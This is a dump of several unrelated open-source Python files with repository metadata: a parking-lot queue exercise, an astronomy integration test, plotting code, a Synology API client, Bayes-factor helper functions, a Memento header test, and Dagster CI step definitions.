return placaBoolean
# SHOW
def mostrarEstacionamento(self):
return self.estacionamento
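# Illustrative note (not part of the original exercise): retirar() makes the
# cars ahead of the target cycle to the back of the queue before the target is
# removed from the end. For example:
# est = Estacionamento()
# for placa in ["A", "B", "C"]:
#     est.adicionarCarro(placa)
# est.retirar("B")             # -> True; A and B cycle to the back
# est.mostrarEstacionamento()  # -> ['C', 'A'] (B removed from the end)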
# RUN
def main():
# OBJECT
estacionamento_1 = Estacionamento()
contador = 0
while contador == 0:
try:
print("------- QUAL OPERAÇÃO DESEJA REALIZAR? --------")
operacao = input("A - ADICIONAR CARRO NO ESTACIONAMENTO: \n"
"R - RETIRAR CARRO DO ESTACIONAMENTO: \n"
"S - MOSTRAR SITUAÇÃO DO ESTACIONAMENTO: \n"
"X - SAIR: ")
# ADD
if operacao.upper() == 'A':
print("---------------- ADICIONAR -----------------")
estacionamento_1.adicionarCarro(input("PLACA DO CARRO: "))
print("--------------------------------------------")
# REMOVE
elif operacao.upper() == 'R':
print("----------------- RETIRAR ------------------")
placa = input("DIGITE A PLACA DO CARRO: ")
situacaoPlaca = estacionamento_1.retirar(placa)
if not situacaoPlaca:
print("O CARRO NÃO ESTÁ ESTACIONADO")
else:
print("O CARRO SAIU DO ESTACIONAMENTO")
print("--------------------------------------------")
# SHOW PARKING LOT
elif operacao.upper() == 'S':
print("------------- ESTACIONAMENTO ---------------")
situacao = estacionamento_1.mostrarEstacionamento()
# PARKING LOT CHECK
if not situacao:
print("Estacionamento Está Vazio")
else:
for i in range(len(situacao)):
print(i+1,"º Carro:",situacao[i])
print("--------------------------------------------")
# EXIT MENU
elif operacao.upper() == 'X':
print("----------------- OBRIGADO !!! ------------------")
contador = 1
# INVALID OPTION
else:
print("------------ DIGITE UMA OPÇÃO CERTA --------------")
# VALUE ERROR
except ValueError:
print("DIGITE UMA OPCÃO CORRETA")
main()
| 33.606742
| 76
| 0.439652
|
092d02390a5e1e6226277aec116588c5b84a96c8
| 2,734
|
py
|
Python
|
test/integration/tests/model_mapper/link_variable_to_constant_floats.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
test/integration/tests/model_mapper/link_variable_to_constant_floats.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
test/integration/tests/model_mapper/link_variable_to_constant_floats.py
|
AshKelly/PyAutoLens
|
043795966338a655339e61782253ad67cc3c14e6
|
[
"MIT"
] | null | null | null |
import os
import shutil
from autofit import conf
from autofit.optimize import non_linear as nl
from autolens.data import ccd
from autolens.model.galaxy import galaxy, galaxy_model as gm
from autolens.pipeline import phase as ph
from autolens.pipeline import pipeline as pl
from autolens.model.profiles import light_profiles as lp
from test.integration import tools
test_type = 'model_mapper'
test_name = "link_variable_to_constant_floats"
path = '{}/../../'.format(os.path.dirname(os.path.realpath(__file__)))
output_path = path+'output/'+test_type
config_path = path+'config'
conf.instance = conf.Config(config_path=config_path, output_path=output_path)
def pipeline():
sersic = lp.EllipticalSersic(centre=(0.0, 0.0), axis_ratio=0.8, phi=90.0, intensity=1.0, effective_radius=1.3,
sersic_index=3.0)
lens_galaxy = galaxy.Galaxy(light_profile=sersic)
tools.reset_paths(test_name=test_name, output_path=output_path)
tools.simulate_integration_image(test_name=test_name, pixel_scale=0.1, lens_galaxies=[lens_galaxy],
source_galaxies=[], target_signal_to_noise=30.0)
ccd_data = ccd.load_ccd_data_from_fits(image_path=path + '/data/' + test_name + '/image.fits',
psf_path=path + '/data/' + test_name + '/psf.fits',
noise_map_path=path + '/data/' + test_name + '/noise_map.fits',
pixel_scale=0.1)
pipeline = make_pipeline(test_name=test_name)
pipeline.run(data=ccd_data)
def make_pipeline(test_name):
class MMPhase(ph.LensPlanePhase):
def pass_priors(self, previous_results):
self.lens_galaxies.lens.light.axis_ratio = 0.2
self.lens_galaxies.lens.light.phi = 90.0
phase1 = MMPhase(lens_galaxies=dict(lens=gm.GalaxyModel(light=lp.EllipticalSersic)),
optimizer_class=nl.MultiNest, phase_name="{}/phase1".format(test_name))
phase1.optimizer.const_efficiency_mode = True
phase1.optimizer.n_live_points = 20
phase1.optimizer.sampling_efficiency = 0.8
class MMPhase2(ph.LensPlanePhase):
def pass_priors(self, previous_results):
self.lens_galaxies.lens = previous_results[0].constant.lens
phase2 = MMPhase2(lens_galaxies=dict(lens=gm.GalaxyModel(light=lp.EllipticalSersic)),
optimizer_class=nl.MultiNest, phase_name="{}/phase2".format(test_name))
phase2.optimizer.const_efficiency_mode = True
phase2.optimizer.n_live_points = 20
phase2.optimizer.sampling_efficiency = 0.8
return pl.PipelineImaging(test_name, phase1, phase2)
if __name__ == "__main__":
pipeline()
| 36.945946
| 114
| 0.691295
|
9a6bd509a5d8a88dad874aebe9990c22fb9cce35
| 3,339
|
py
|
Python
|
Advanced_ML/Deep_Learning/plots.py
|
jrclimer/Projects
|
6023f8309685d1a273d7e89993863c89ad85dfb5
|
[
"MIT"
] | 27
|
2016-11-18T11:15:58.000Z
|
2021-02-26T05:46:37.000Z
|
Advanced_ML/Deep_Learning/plots.py
|
imsrgadich/Projects_shang
|
a9d4395a98a79fb0a700a99168cd358ab7494fdf
|
[
"MIT"
] | 1
|
2022-01-21T16:09:40.000Z
|
2022-01-21T16:30:10.000Z
|
Advanced_ML/Deep_Learning/plots.py
|
imsrgadich/Projects_shang
|
a9d4395a98a79fb0a700a99168cd358ab7494fdf
|
[
"MIT"
] | 22
|
2016-11-27T06:02:26.000Z
|
2021-09-22T13:40:55.000Z
|
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
try:
import cPickle as pickle
except ImportError:
import pickle
with open("batch_norm_accuracy.p","rb") as f:
batch_norm_accuracy = pickle.load(f)
with open("rbm_pretraining_accuracy.p","rb") as f:
rbm_pretraining_accuracy = pickle.load(f)
with open("grad_desc_2_accuracy.p","rb") as f:
grad_desc_2_accuracy = pickle.load(f)
with open("grad_desc_4_accuracy.p","rb") as f:
grad_desc_4_accuracy = pickle.load(f)
with open("res_grad_desc_accuracy.p","rb") as f:
res_grad_desc_accuracy = pickle.load(f)
with open("res_batch_norm_accuracy.p","rb") as f:
res_batch_norm_accuracy = pickle.load(f)
fig = plt.figure(figsize=(12, 8))
ax1 = fig.add_subplot(111)
ax1.scatter(range(len(batch_norm_accuracy)),batch_norm_accuracy,alpha=0.5,s=2,c='b',edgecolor='none')
ax1.scatter(range(len(rbm_pretraining_accuracy)),rbm_pretraining_accuracy,alpha=0.5,s=2,c='r',edgecolor='none')
ax1.scatter(range(len(grad_desc_2_accuracy)),grad_desc_2_accuracy,alpha=0.5,s=2,c='c',edgecolor='none')
ax1.scatter(range(len(grad_desc_4_accuracy)),grad_desc_4_accuracy,alpha=0.5,s=2,c='g',edgecolor='none')
ax1.scatter(range(len(res_grad_desc_accuracy)),res_grad_desc_accuracy,alpha=0.5,s=2,c='m',edgecolor='none')
ax1.scatter(range(len(res_batch_norm_accuracy)),res_batch_norm_accuracy,alpha=0.5,s=2,c='darkorange',edgecolor='none')
s1 = mpatches.Patch(color='b', label='batch normalization')
s2 = mpatches.Patch(color='r', label='rbm pre-training')
s3 = mpatches.Patch(color='c', label='2-layer gradient descent')
s4 = mpatches.Patch(color='g', label='4-layer gradient descent')
s5 = mpatches.Patch(color='m', label='residual gradient descent')
s6 = mpatches.Patch(color='darkorange', label='residual batch norm')
plt.legend(handles=[s3,s4,s1,s5,s6,s2],loc='upper right')
plt.title("Test Set Accuracy")
plt.xlabel('Iteration')
plt.ylabel('Test Set Error')
plt.xlim(-100, 3000)
plt.savefig('test_accuracy_1.png')
plt.show()
fig = plt.figure(figsize=(12, 8))
ax1 = fig.add_subplot(111)
ax1.scatter(range(len(batch_norm_accuracy))[200:],batch_norm_accuracy[200:],alpha=0.5,s=2,c='b',edgecolor='none')
ax1.scatter(range(len(rbm_pretraining_accuracy))[200:],rbm_pretraining_accuracy[200:],alpha=0.5,s=2,c='r',edgecolor='none')
ax1.scatter(range(len(grad_desc_2_accuracy))[200:],grad_desc_2_accuracy[200:],alpha=0.5,s=2,c='c',edgecolor='none')
ax1.scatter(range(len(grad_desc_4_accuracy))[200:],grad_desc_4_accuracy[200:],alpha=0.5,s=2,c='g',edgecolor='none')
ax1.scatter(range(len(res_grad_desc_accuracy))[200:],res_grad_desc_accuracy[200:],alpha=0.5,s=2,c='m',edgecolor='none')
ax1.scatter(range(len(res_batch_norm_accuracy))[200:],res_batch_norm_accuracy[200:],alpha=0.5,s=2,c='darkorange',edgecolor='none')
s1 = mpatches.Patch(color='b', label='batch normalization')
s2 = mpatches.Patch(color='r', label='rbm pre-training')
s3 = mpatches.Patch(color='c', label='2-layer gradient descent')
s4 = mpatches.Patch(color='g', label='4-layer gradient descent')
s5 = mpatches.Patch(color='m', label='residual gradient descent')
s6 = mpatches.Patch(color='darkorange', label='residual batch norm')
plt.legend(handles=[s3,s4,s1,s5,s6,s2],loc='upper right')
plt.title("Test Set Accuracy (Zoomed)")
plt.xlabel('Iteration')
plt.ylabel('Test Set Error')
plt.xlim(200, 3000)
plt.savefig('test_accuracy_2.png')
plt.show()
| 45.121622
| 126
| 0.743336
|
36bebff1809a3d17ac207d96410e0907e74c07d8
| 7,616
|
py
|
Python
|
synopy/base.py
|
gspanos/synopy
|
c99680308eb929bdef5d38eb100cd48e0403b705
|
[
"MIT"
] | 14
|
2015-07-17T03:52:22.000Z
|
2021-04-22T10:56:41.000Z
|
synopy/base.py
|
tipok/synopy
|
276202e4f315577088df2abd5cc239a29620f570
|
[
"MIT"
] | 1
|
2019-09-10T11:13:38.000Z
|
2019-10-06T15:06:20.000Z
|
synopy/base.py
|
tipok/synopy
|
276202e4f315577088df2abd5cc239a29620f570
|
[
"MIT"
] | 14
|
2015-07-23T15:09:39.000Z
|
2021-12-12T09:04:11.000Z
|
# -*- coding: utf-8 -*-
import json
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin
import six
import requests
from .errors import format_error
WEBAPI_PREFIX = 'webapi'
class Authentication(object):
def __init__(self, sid, format='cookie'):
assert format in ('cookie', 'sid'), "invalid sid format"
self.sid = sid
self.format = format
def build_params(self):
auth = {}
sid_key = self.format == 'cookie' and 'id' or '_id'
auth[sid_key] = self.sid
return auth
class Connection(object):
def __init__(self, protocol, domain, auth=None, port=80, verify=True):
assert protocol in ('http', 'https'), "invalid protocol"
assert int(port), "port number must be integer"
self.protocol = protocol
self.domain = domain
self.auth = auth
self.port = str(port)
self.verify = verify
def build_url(self, path):
base_path = u'://'.join([self.protocol, self.domain])
base_path = u':'.join([base_path, self.port])
return urljoin(base_path, path)
def build_request_options(self, http_method, params):
opts = {'params' if http_method == 'get' else 'data': params}
if self.auth:
# if we have credentials, then use them.
auth_params = self.auth.build_params()
if self.auth.format == 'sid':
# pass the sid along with the request params (POST requests have no
# 'params' entry yet, so create it on demand)
opts.setdefault('params', {}).update(auth_params)
else:
# pass it as a cookie
opts['cookies'] = auth_params
opts['verify'] = self.verify
return opts
def send(self, path, http_method, namespace, params, caller=None):
api_method = params['method']
http_method = http_method.lower()
assert http_method in ('get', 'post'), "invalid http method"
url = self.build_url(path)
opts = self.build_request_options(http_method, params)
if http_method == 'get':
resp = requests.get(url, **opts)
else:
resp = requests.post(url, **opts)
response = self.handle_response(resp, namespace)
if caller and caller.has_handler_for(api_method):
return caller.get_handler_for(api_method)(response)
return response
def handle_response(self, resp, namespace):
response = Response(resp)
if response.status_code == 200:
if not response.is_success():
errno = response.error_code
response.error_message = format_error(errno, namespace)
return response
def authenticate(self, account, passwd):
path = u'/'.join([WEBAPI_PREFIX, 'auth.cgi'])
params = {
'method': 'login',
'account': account,
'passwd': passwd,
'version': 2,
'api': 'SYNO.API.Auth',
'format': 'sid',
'session': 'DownloadStation'
}
resp = self.send(path, 'GET', 'SYNO.API.Auth', params)
if resp.is_success():
sid = resp.cookies['id']
self.auth = Authentication(sid)
else:
raise ValueError(u"Wrong account name or password")
class Response(object):
def __init__(self, resp):
# the ``requests`` library response object
self.raw_response = resp
# response headers
self.headers = resp.headers
# response cookies
self.cookies = resp.cookies
# the http status code
self.status_code = resp.status_code
# the url that initiated this response
self.url = resp.url
# the deserialized json data
self.payload = resp.status_code == 200 and json.loads(
resp.content) or {}
# user friendly message
self.error_message = None
def is_success(self):
return self.payload.get('success') is True
@property
def error_code(self):
return self.payload.get('error') and self.payload['error']['code'] or None
def __str__(self):
return str(self.payload)
def _send_command(self, api_method, http_method, params):
all_params = self.base_params
all_params['method'] = api_method
all_params.update(params)
return self.conn.send(
self.path,
http_method,
self.namespace,
all_params,
caller=self
)
class ApiBaseMeta(type):
def __init__(cls, name, bases, attrs):
super(ApiBaseMeta, cls).__init__(name, bases, attrs)
parents = [b for b in bases if isinstance(b, ApiBaseMeta)]
if not parents:
return
api_methods = attrs.pop('methods')
if isinstance(api_methods, six.string_types):
api_methods = [api_methods]
for api_method in api_methods:
cls.add_api_method(api_method)
def add_api_method(cls, api_method):
def wrapped_send(_api_method_name, _http_method):
def _wrapped(self, **params):
return _send_command(self, _api_method_name, _http_method, params)
return _wrapped
if isinstance(api_method, six.string_types):
api_method_name, func_name, http_method = api_method, api_method, 'GET'
elif isinstance(api_method, (list, tuple)):
if len(api_method) == 3:
api_method_name, func_name, http_method = api_method
assert isinstance(
api_method_name, six.string_types), "Invalid API method name"
func_name = func_name or api_method_name
http_method = http_method or 'GET'
elif len(api_method) == 2:
api_method_name, func_name = api_method
assert isinstance(
api_method_name, six.string_types), "Invalid API method name"
func_name = func_name or api_method_name
http_method = 'GET'
elif len(api_method) == 1:
api_method_name = api_method[0]
assert isinstance(
api_method_name, six.string_types), "Invalid API method name"
func_name = api_method_name
http_method = 'GET'
else:
raise ValueError("Invalid API method definition: {} parameters!"
.format(len(api_method)))
else:
raise TypeError(
"Invalid API method type: {!r}".format(type(api_method)))
setattr(
cls,
func_name,
wrapped_send(api_method_name, http_method)
)
@six.add_metaclass(ApiBaseMeta)
class ApiBase(object):
path = None
namespace = None
methods = None
def __init__(self, connection, version, namespace_prefix=WEBAPI_PREFIX):
assert int(version), "version number must be integer"
self.conn = connection
self.version = str(version)
self.prefix = namespace_prefix or u''
self.path = u'/'.join([self.prefix, self.path])
self._handlers = {}
@property
def base_params(self):
return {
'api': self.namespace,
'version': self.version
}
def set_handler_for(self, api_method, handler):
self._handlers[api_method] = handler
def has_handler_for(self, api_method):
return api_method in self._handlers
def get_handler_for(self, api_method):
return self._handlers[api_method]
def remove_handler_for(self, api_method):
del self._handlers[api_method]
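# Illustrative sketch (not part of the original module): the namespace, path
# and method names below are hypothetical, chosen only to exercise the three
# accepted `methods` entry formats handled by ApiBaseMeta.
class _ExampleApi(ApiBase):
    path = 'ExampleStation/task.cgi'
    namespace = 'SYNO.Example.Task'
    methods = [
        'list',                        # GET, function name == API method name
        ('getinfo', 'get_info'),       # GET, custom function name
        ('create', 'create', 'POST'),  # explicit HTTP method
    ]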
| 32.135021
| 83
| 0.59375
|
b0be3a99e96bd4840add000a3d6ff7467f3e2d70
| 4,570
|
py
|
Python
|
bindings/python/cconfigspace/evaluation.py
|
deephyper/CCS
|
dd8c976eca2a510c995862cc5c871e81932f3ff4
|
[
"BSD-3-Clause"
] | 1
|
2021-11-29T16:31:28.000Z
|
2021-11-29T16:31:28.000Z
|
bindings/python/cconfigspace/evaluation.py
|
deephyper/CCS
|
dd8c976eca2a510c995862cc5c871e81932f3ff4
|
[
"BSD-3-Clause"
] | 1
|
2021-12-15T10:37:41.000Z
|
2021-12-15T10:48:24.000Z
|
bindings/python/cconfigspace/evaluation.py
|
deephyper/CCS
|
dd8c976eca2a510c995862cc5c871e81932f3ff4
|
[
"BSD-3-Clause"
] | 2
|
2021-09-16T18:20:47.000Z
|
2021-12-07T17:54:11.000Z
|
import ctypes as ct
from .base import Object, Error, CEnumeration, ccs_error, ccs_result, _ccs_get_function, ccs_context, ccs_hyperparameter, ccs_configuration_space, ccs_configuration, ccs_datum, ccs_datum_fix, ccs_objective_space, ccs_evaluation
from .context import Context
from .hyperparameter import Hyperparameter
from .configuration_space import ConfigurationSpace
from .configuration import Configuration
from .objective_space import ObjectiveSpace
from .binding import Binding
class ccs_comparison(CEnumeration):
_members_ = [
('BETTER', -1),
('EQUIVALENT', 0),
('WORSE', 1),
('NOT_COMPARABLE', 2) ]
ccs_create_evaluation = _ccs_get_function("ccs_create_evaluation", [ccs_objective_space, ccs_configuration, ccs_result, ct.c_size_t, ct.POINTER(ccs_datum), ct.c_void_p, ct.POINTER(ccs_evaluation)])
ccs_evaluation_get_objective_space = _ccs_get_function("ccs_evaluation_get_objective_space", [ccs_evaluation, ct.POINTER(ccs_objective_space)])
ccs_evaluation_get_configuration = _ccs_get_function("ccs_evaluation_get_configuration", [ccs_evaluation, ct.POINTER(ccs_configuration)])
ccs_evaluation_get_error = _ccs_get_function("ccs_evaluation_get_error", [ccs_evaluation, ct.POINTER(ccs_result)])
ccs_evaluation_set_error = _ccs_get_function("ccs_evaluation_set_error", [ccs_evaluation, ccs_result])
ccs_evaluation_get_objective_value = _ccs_get_function("ccs_evaluation_get_objective_value", [ccs_evaluation, ct.c_size_t, ct.POINTER(ccs_datum)])
ccs_evaluation_get_objective_values = _ccs_get_function("ccs_evaluation_get_objective_values", [ccs_evaluation, ct.c_size_t, ct.POINTER(ccs_datum), ct.POINTER(ct.c_size_t)])
ccs_evaluation_compare = _ccs_get_function("ccs_evaluation_compare", [ccs_evaluation, ccs_evaluation, ct.POINTER(ccs_comparison)])
ccs_evaluation_check = _ccs_get_function("ccs_evaluation_check", [ccs_evaluation])
class Evaluation(Binding):
def __init__(self, handle = None, retain = False, auto_release = True,
objective_space = None, configuration = None, error = ccs_error.SUCCESS, values = None, user_data = None):
if handle is None:
count = 0
if values:
count = len(values)
vals = (ccs_datum * count)()
for i in range(count):
vals[i].value = values[i]
else:
vals = None
handle = ccs_evaluation()
res = ccs_create_evaluation(objective_space.handle, configuration.handle, error, count, vals, user_data, ct.byref(handle))
Error.check(res)
super().__init__(handle = handle, retain = False)
else:
super().__init__(handle = handle, retain = retain, auto_release = auto_release)
@classmethod
def from_handle(cls, handle, retain = True, auto_release = True):
return cls(handle = handle, retain = retain, auto_release = auto_release)
@property
def objective_space(self):
if hasattr(self, "_objective_space"):
return self._objective_space
v = ccs_objective_space()
res = ccs_evaluation_get_objective_space(self.handle, ct.byref(v))
Error.check(res)
self._objective_space = ObjectiveSpace.from_handle(v)
return self._objective_space
@property
def configuration(self):
if hasattr(self, "_configuration"):
return self._configuration
v = ccs_configuration()
res = ccs_evaluation_get_configuration(self.handle, ct.byref(v))
Error.check(res)
self._configuration = Configuration.from_handle(v)
return self._configuration
@property
def error(self):
v = ccs_result()
res = ccs_evaluation_get_error(self.handle, ct.byref(v))
Error.check(res)
return v.value
@error.setter
def error(self, v):
res = ccs_evaluation_set_error(self.handle, v)
Error.check(res)
@property
def num_objective_values(self):
if hasattr(self, "_num_objective_values"):
return self._num_objective_values
v = ct.c_size_t()
res = ccs_evaluation_get_objective_values(self.handle, 0, None, ct.byref(v))
Error.check(res)
self._num_objective_values = v.value
return self._num_objective_values
@property
def objective_values(self):
sz = self.num_objective_values
if sz == 0:
return []
v = (ccs_datum * sz)()
res = ccs_evaluation_get_objective_values(self.handle, sz, v, None)
Error.check(res)
return [x.value for x in v]
def compare(self, other):
v = ccs_comparison(0)
res = ccs_evaluation_compare(self.handle, other.handle, ct.byref(v))
Error.check(res)
return v.value
def check(self):
res = ccs_evaluation_check(self.handle)
Error.check(res)
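# Illustrative usage sketch (not part of the original module; assumes an
# ObjectiveSpace and Configuration already built with these bindings, and a
# single hypothetical objective value):
def _example_evaluation(objective_space, configuration):
    ev = Evaluation(objective_space=objective_space,
                    configuration=configuration, values=[0.5])
    return ev.objective_values  # -> [0.5]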
| 41.171171
| 227
| 0.745295
|
8eae78bf00eb9187a73cad02db25fd6a44569cba
| 3,050
|
py
|
Python
|
mementoweb/validator/tests/link_header_timegate_test.py
|
lanl/memento-validator
|
1937fcbf98194af7d649438603466480683707f3
|
[
"BSD-3-Clause"
] | 2
|
2022-01-11T17:08:56.000Z
|
2022-02-21T15:01:00.000Z
|
mementoweb/validator/tests/link_header_timegate_test.py
|
lanl/memento-validator
|
1937fcbf98194af7d649438603466480683707f3
|
[
"BSD-3-Clause"
] | 1
|
2021-11-09T21:53:37.000Z
|
2021-11-09T21:53:37.000Z
|
mementoweb/validator/tests/link_header_timegate_test.py
|
lanl/memento-validator
|
1937fcbf98194af7d649438603466480683707f3
|
[
"BSD-3-Clause"
] | null | null | null |
#
# Copyright (c) 2021. Los Alamos National Laboratory (LANL).
# Written by: Bhanuka Mahanama (bhanuka@lanl.gov)
# Research and Prototyping Team, SRO-RL,
# Los Alamos National Laboratory
#
# Correspondence: Lyudmila Balakireva, PhD (ludab@lanl.gov)
# Research and Prototyping Team, SRO-RL,
# Los Alamos National Laboratory
#
# See LICENSE in the project root for license information.
#
import typing
from typing import List
from mementoweb.validator.util.http import HttpResponse
from mementoweb.validator.tests.link_header_test import LinkHeaderTest
from mementoweb.validator.tests.test import TestReport, TestResult
from mementoweb.validator.validator_types import ResourceType
class LinkHeaderTimeGateTestReport(TestReport):
time_gate_uris: List[str] = []
def __init__(self, time_gate_uris=None, *args, **kwargs):
super(LinkHeaderTimeGateTestReport, self).__init__(*args, **kwargs)
if time_gate_uris is None:
time_gate_uris = []
self.time_gate_uris = time_gate_uris
def to_json(self):
return_value = TestReport.to_json(self)
return_value['timegates'] = self.time_gate_uris
return return_value
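# Illustrative shape of the serialized report (all values hypothetical):
# {"name": ..., "description": ..., "status": ...,
#  "tests": [...], "timegates": ["http://example.org/timegate/..."]}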
class LinkHeaderTimeGateTest(LinkHeaderTest):
_description = "Tests for the compliance of Link header timegate relation."
TIMEGATE_PRESENT = "Timegate link present"
TIMEGATE_NOT_PRESENT = "Timegate link present"
_test_report: LinkHeaderTimeGateTestReport
def __init__(self):
super().__init__()
self._test_report = LinkHeaderTimeGateTestReport(
name=self._name(),
description=self._description,
report_status=TestReport.REPORT_FAIL,
tests=[],
time_gate_uris=[]
)
def test(self, response: HttpResponse, resource_type: ResourceType = ResourceType.ORIGINAL) -> \
LinkHeaderTimeGateTestReport:
# Just for typing support
return typing.cast(LinkHeaderTimeGateTestReport,
super(LinkHeaderTimeGateTest, self).test(response, resource_type))
def _test_original(self, response: HttpResponse) -> LinkHeaderTimeGateTestReport:
self._test_report.report_status = TestReport.REPORT_PASS
timegate_uris = response.search_link_headers("timegate")
if not len(timegate_uris):
self.add_test_result(TestResult(name=LinkHeaderTimeGateTest.TIMEGATE_NOT_PRESENT,
status=TestResult.TEST_FAIL))
self._test_report.report_status = TestReport.REPORT_FAIL
else:
self.add_test_result(TestResult(name=LinkHeaderTimeGateTest.TIMEGATE_PRESENT, status=TestResult.TEST_PASS))
self._test_report.time_gate_uris = [timegate_uri.uri for timegate_uri in timegate_uris]
return self._test_report
def _test_memento(self, response: HttpResponse) -> LinkHeaderTimeGateTestReport:
return self._test_original(response)
| 37.654321
| 119
| 0.697049
|
cc969a9a260956094fc97b518a86e2bbb3160e70
| 3,094
|
py
|
Python
|
.buildkite/dagster-buildkite/dagster_buildkite/steps/integration.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
.buildkite/dagster-buildkite/dagster_buildkite/steps/integration.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
.buildkite/dagster-buildkite/dagster_buildkite/steps/integration.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
import os
from ..defines import GCP_CREDS_LOCAL_FILE
from ..module_build_spec import ModuleBuildSpec
from ..utils import connect_sibling_docker_container, network_buildkite_container
from .test_images import publish_test_images, test_image_depends_fn
SCRIPT_PATH = os.path.dirname(os.path.abspath(__file__))
def integration_suite_extra_cmds_fn(version):
return [
'export AIRFLOW_HOME="/airflow"',
"mkdir -p $${AIRFLOW_HOME}",
"export DAGSTER_DOCKER_IMAGE_TAG=$${BUILDKITE_BUILD_ID}-" + version,
'export DAGSTER_DOCKER_REPOSITORY="$${AWS_ACCOUNT_ID}.dkr.ecr.us-west-2.amazonaws.com"',
"aws ecr get-login --no-include-email --region us-west-2 | sh",
r"aws s3 cp s3://\${BUILDKITE_SECRETS_BUCKET}/gcp-key-elementl-dev.json "
+ GCP_CREDS_LOCAL_FILE,
"export GOOGLE_APPLICATION_CREDENTIALS=" + GCP_CREDS_LOCAL_FILE,
"pushd python_modules/libraries/dagster-celery",
# Run the rabbitmq db. We are in docker running docker
# so this will be a sibling container.
"docker-compose up -d --remove-orphans", # clean up in hooks/pre-exit,
# Can't use host networking on buildkite and communicate via localhost
# between these sibling containers, so pass along the ip.
network_buildkite_container("rabbitmq"),
connect_sibling_docker_container("rabbitmq", "test-rabbitmq", "DAGSTER_CELERY_BROKER_HOST"),
"popd",
]
def integration_steps():
tests = []
tests += publish_test_images()
tests += ModuleBuildSpec(
os.path.join("integration_tests", "python_modules", "dagster-k8s-test-infra"),
upload_coverage=True,
).get_tox_build_steps()
integration_suites_root = os.path.join(
SCRIPT_PATH, "..", "..", "..", "..", "integration_tests", "test_suites"
)
integration_suites = [
os.path.join("integration_tests", "test_suites", suite)
for suite in os.listdir(integration_suites_root)
]
for integration_suite in integration_suites:
tox_env_suffixes = None
if integration_suite == os.path.join(
"integration_tests", "test_suites", "k8s-integration-test-suite"
):
tox_env_suffixes = ["-default", "-markscheduler"]
elif integration_suite == os.path.join(
"integration_tests", "test_suites", "celery-k8s-integration-test-suite"
):
tox_env_suffixes = ["-default", "-markusercodedeployment", "-markdaemon"]
tests += ModuleBuildSpec(
integration_suite,
env_vars=[
"AIRFLOW_HOME",
"AWS_ACCOUNT_ID",
"AWS_ACCESS_KEY_ID",
"AWS_SECRET_ACCESS_KEY",
"BUILDKITE_SECRETS_BUCKET",
"GOOGLE_APPLICATION_CREDENTIALS",
],
upload_coverage=True,
extra_cmds_fn=integration_suite_extra_cmds_fn,
depends_on_fn=test_image_depends_fn,
tox_env_suffixes=tox_env_suffixes,
retries=2,
).get_tox_build_steps()
return tests
| 40.181818
| 100
| 0.655785
|
04ed5e15ad151bf2f904f155a257774efbc8bcad
| 2,213
|
py
|
Python
|
scripts/savagedickey.py
|
hallav/LuxUS-HS
|
12c0f0590fb40b2674feb5e8a1ccc1b6f0905b8c
|
[
"MIT"
] | 2
|
2020-06-26T16:33:04.000Z
|
2021-10-17T10:39:39.000Z
|
scripts/savagedickey.py
|
hallav/LuxUS-HS
|
12c0f0590fb40b2674feb5e8a1ccc1b6f0905b8c
|
[
"MIT"
] | null | null | null |
scripts/savagedickey.py
|
hallav/LuxUS-HS
|
12c0f0590fb40b2674feb5e8a1ccc1b6f0905b8c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import numpy
import scipy.stats
#The Savage-Dickey estimator computation is based on the implementation by Äijö et al. (2016) available at https://github.com/tare/LuxGLM (MIT lisence)
def calculate_savagedickey(prior1_mean,prior1_cov,prior2_mean,prior2_cov,samples1,samples2):
samples1_mean = numpy.mean(samples1,0)
samples1_cov = numpy.cov(samples1,rowvar=0)
samples2_mean = numpy.mean(samples2,0)
samples2_cov = numpy.cov(samples2,rowvar=0)
numerator = scipy.stats.multivariate_normal.pdf(numpy.zeros(prior1_mean.shape),mean=prior1_mean-prior2_mean,cov=prior1_cov+prior2_cov)
denominator = scipy.stats.multivariate_normal.pdf(numpy.zeros(prior1_mean.shape),mean=samples1_mean-samples2_mean,cov=samples1_cov+samples2_cov)
return numerator/denominator
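# Note (not in the original source): the ratio above is the Savage-Dickey
# estimate of the Bayes factor BF_01 = p(delta = 0 | prior) /
# p(delta = 0 | posterior) for the difference delta = theta_1 - theta_2,
# with both densities approximated by Gaussians and evaluated at the point
# null delta = 0.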
def calculate_savagedickey_kde(prior1_mean,prior1_cov,prior2_mean,prior2_cov,samples1,samples2):
Delta = samples1-samples2
density = scipy.stats.gaussian_kde(Delta,bw_method='scott')
numerator = scipy.stats.multivariate_normal.pdf(numpy.zeros(prior1_mean.shape),mean=prior1_mean-prior2_mean,cov=prior1_cov+prior2_cov)
denominator = density.evaluate([0])[0]
return numerator/denominator
def calculate_savagedickey_kde_1d(prior_mean,prior_cov,samples):
density = scipy.stats.gaussian_kde(samples.T,bw_method='scott')
numerator = scipy.stats.multivariate_normal.pdf(numpy.zeros(prior_mean.shape),mean=prior_mean,cov=prior_cov)
denominator = density.evaluate([0,0])[0]
return numerator/denominator
def calculate_savagedickey_kde_window(prior1_mean,prior1_cov,prior2_mean,prior2_cov,samples1,samples2):
#samples1 and samples2 have shape (# of dims, # of samples). prior1_mean and prior2_mean have shape (#dim,1) and prior1_cov and prior2_cov have shape (#dim,#dim)
Delta = samples1-samples2
density = scipy.stats.gaussian_kde(Delta,bw_method='scott')
numerator = scipy.stats.multivariate_normal.pdf(numpy.zeros(Delta.shape[0]),mean=prior1_mean-prior2_mean,cov=prior1_cov+prior2_cov)
denominator = density.evaluate(numpy.zeros(Delta.shape[0]))
return numerator/denominator, numerator, denominator
| 48.108696
| 165
| 0.779485
|
e75126644b521a53b69326369c1ecb2a487269f7
| 1,698
|
py
|
Python
|
tests/test_utils/platform_config.py
|
gyshi/intel-models
|
4ead44aa254a84109ac8019f5d386e3adb75ac26
|
[
"Apache-2.0"
] | 1
|
2019-09-11T21:41:36.000Z
|
2019-09-11T21:41:36.000Z
|
tests/test_utils/platform_config.py
|
gyshi/intel-models
|
